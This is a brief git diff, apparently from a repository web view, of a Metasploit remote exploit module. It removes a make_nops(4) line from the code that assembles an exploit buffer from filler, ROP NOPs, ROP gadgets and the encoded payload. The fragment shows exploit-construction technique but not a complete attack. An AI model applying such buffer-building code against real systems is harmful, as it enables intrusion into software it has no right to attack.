Remove unnecessary NOPs
parent
12471660e9
commit
7fc3511ba9
|
@ -108,7 +108,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << rand_text_alpha_upper(56)
|
||||
sploit << rop_nops(8)
|
||||
sploit << rop_gadgets
|
||||
sploit << make_nops(4)
|
||||
sploit << payload.encoded
|
||||
sploit << rand_text_alpha_upper(10000) # make it crash
|
||||
|
||||
|
|
Loading…
Reference in New Issue